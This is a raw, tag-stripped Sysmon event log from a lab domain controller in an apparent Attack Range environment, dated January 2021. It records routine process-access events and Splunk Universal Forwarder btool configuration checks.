13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429C-6000-6400-000000009A01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429C-6000-6400-000000009A01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.954{08A6967A-429C-6000-6400-000000009A01}3796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.915{08A6967A-429C-6000-6300-000000009A01}40002596C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.650{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6300-000000009A01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.650{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.650{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.650{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429C-6000-6300-000000009A01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-429C-6000-6200-000000009A01}40043136C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-429C-6000-6300-000000009A01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.648{08A6967A-429C-6000-6300-000000009A01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429C-6000-6200-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6200-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Win